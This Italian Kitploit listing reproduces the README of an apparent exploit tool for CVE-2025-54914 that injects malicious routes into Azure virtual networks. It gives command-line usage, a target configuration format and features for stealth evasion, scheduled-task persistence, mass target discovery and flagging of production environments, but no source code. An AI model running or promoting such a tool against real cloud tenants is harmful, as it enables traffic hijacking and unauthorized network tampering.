Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-54914-PoC — Exploit per CVE-2025-54914 in Azure Networking, che crea route dannose con evasione, persistenza, scansione multi-target e reportistica per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/ash1996x/cve-2025-54914-poc
RicognizioneMeccanismi di PersistenzaAnalisi delle VulnerabilitàExploitEvasione IDS/IPSPenetration TestingSicurezza Cloud
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

Exploit per CVE-2025-54914 in Azure Networking, che crea route dannose con evasione, persistenza, scansione multi-target e reportistica per test di sicurezza autorizzati.

Vedi Repository
44311 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-54914 Azure Route Exploit

Panoramica

Questa è un'implementazione migliorata dell'exploit CVE-2025-54914 per il routing di rete di Azure. Questa versione mantiene le funzionalità principali della CVE aggiungendo ulteriori caratteristiche tra cui persistenza, elusione, scansione multi-target e gestione degli errori.

Caratteristiche

Funzionalità principali della CVE

  • Creazione di route: Crea route dannose nelle reti virtuali di Azure
  • Eliminazione di route: Rimuove le route create per la pulizia
  • Compatibilità API: Funziona con l'API di Gestione Azure 2025-09-01
  • Autenticazione: Supporta l'autenticazione tramite Azure CLI e token manuale

Funzionalità aggiuntive

  • Tecniche di elusione: Ritardi casuali, rotazione dello user agent, offuscamento delle richieste
  • Persistenza: Creazione di attività pianificate, modalità di monitoraggio continuo
  • Scansione multi-target: Scansione e sfruttamento concorrenti di più obiettivi
  • Reportistica completa: Rapporti dettagliati con analisi dei successi/fallimenti
  • Gestione degli errori: Gestione elegante dei fallimenti e recupero
  • Gestione della configurazione: Configurazione degli obiettivi basata su JSON
  • Scoperta degli obiettivi: Rilevamento automatico delle risorse vulnerabili
  • Valutazione del rischio: Analisi delle vulnerabilità e punteggio di rischio

Installazione

Prerequisiti

# Installa le dipendenze Python
pip install requests

# Installa Azure CLI (per autenticazione)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Configurazione

# Rendi eseguibili gli script
chmod +x exploit.py
chmod +x exploit_utils.py

# Autenticati con Azure
az login

Utilizzo

Utilizzo base

Sfruttamento di un singolo obiettivo

# Crea una route su un singolo obiettivo
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Elimina una route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

Sfruttamento multi-target

# Crea un file di configurazione
python exploit_utils.py discover --output targets.json

# Sfrutta tutti gli obiettivi
python exploit.py --targets-file targets.json --operation create

Modalità scansione

# Scansiona gli obiettivi senza sfruttarli
python exploit.py --targets-file targets.json --scan-only

Modalità persistenza

# Abilita la persistenza con intervalli di 30 minuti
python exploit.py --targets-file targets.json --persistence-mode --interval 30

Utilizzo avanzato

Elusione e invisibilità

# Intervalli di ritardo personalizzati per l'elusione
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

Modalità prova (dry run)

# Test senza sfruttamento reale
python exploit.py --targets-file targets.json --dry-run

Logging dettagliato

# Abilita il logging di debug
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

Configurazione

Formato della configurazione degli obiettivi

{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

Variabili d'ambiente

# Token di accesso ad Azure (alternativa ad Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Livello di log
export LOG_LEVEL="INFO"

Script di utilità

Scoperta degli obiettivi

# Scopri tutti gli obiettivi accessibili
python exploit_utils.py discover --output discovered_targets.json

# Scopri sottoscrizioni specifiche
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

Generazione della configurazione

# Genera la configurazione dell'exploit dagli obiettivi scoperti
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

Analisi delle vulnerabilità

# Analizza gli obiettivi per la valutazione del rischio
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

Funzionalità di sicurezza

Tecniche di elusione

  • Temporizzazione delle richieste: Ritardi casuali tra le richieste
  • Rotazione dello user agent: Molteplici user agent di browser
  • Offuscamento delle intestazioni: Intestazioni HTTP realistiche
  • Verifica SSL: Validazione corretta dei certificati

Meccanismi di persistenza

  • Attività pianificate: Creazione di attività pianificate su Windows
  • Modalità continua: Persistenza a lungo termine
  • Gestione delle sessioni: Preservazione dello stato tra le esecuzioni
  • Persistenza della configurazione: Impostazioni salvate su disco

Gestione degli errori

  • Degrado graduale: Continua nonostante fallimenti individuali
  • Protezione dal timeout: Previene richieste bloccate
  • Gestione dei segnali: Arresto pulito su interruzione
  • Pulizia delle risorse: Pulizia automatica all'uscita

Reportistica

Rapporti sugli exploit

  • Risultati dell'operazione: Successo/fallimento per ogni obiettivo
  • Informazioni temporali: Timestamp di esecuzione
  • Dettagli degli errori: Messaggi di errore dettagliati
  • Statistiche riassuntive: Tassi di successo complessivi

Rapporti di scoperta

  • Inventario degli obiettivi: Elenco completo delle risorse scoperte
  • Ripartizione per sottoscrizione: Obiettivi raggruppati per sottoscrizione
  • Dettagli delle risorse: Informazioni su VNet, subnet e posizione

Analisi delle vulnerabilità

  • Valutazione del rischio: Categorizzazione del rischio alto/medio/basso
  • Indicatori di produzione: Identificazione degli ambienti di produzione
  • Analisi dei tag: Punteggio di rischio basato sui tag delle risorse

Buone pratiche

Sicurezza operativa

  1. Usa la modalità prova: Testa sempre prima con --dry-run
  2. Limita l'ambito: Inizia con ambienti non di produzione
  3. Monitora i log: Controlla i log per comportamenti imprevisti
  4. Pulisci: Rimuovi le route create dopo i test

Ottimizzazione delle prestazioni

  1. Limiti dei worker: Regola --max-workers in base alla capacità del sistema
  2. Regolazione dei ritardi: Bilancia invisibilità vs. velocità con le impostazioni di ritardo
  3. Elaborazione in batch: Usa file di obiettivi per operazioni su larga scala
  4. Monitoraggio delle risorse: Controlla le risorse di sistema durante l'esecuzione

Recupero da errori

  1. Controlla i log: Esamina i messaggi di errore per la risoluzione
  2. Verifica i permessi: Assicurati di avere i permessi Azure corretti
  3. Connettività di rete: Verifica la connettività Internet
  4. Validità del token: Controlla lo stato dell'autenticazione Azure CLI

Risoluzione dei problemi

Problemi comuni

Errori di autenticazione

# Riautenticati con Azure
az login

# Controlla l'account corrente
az account show
Scarica lo strumento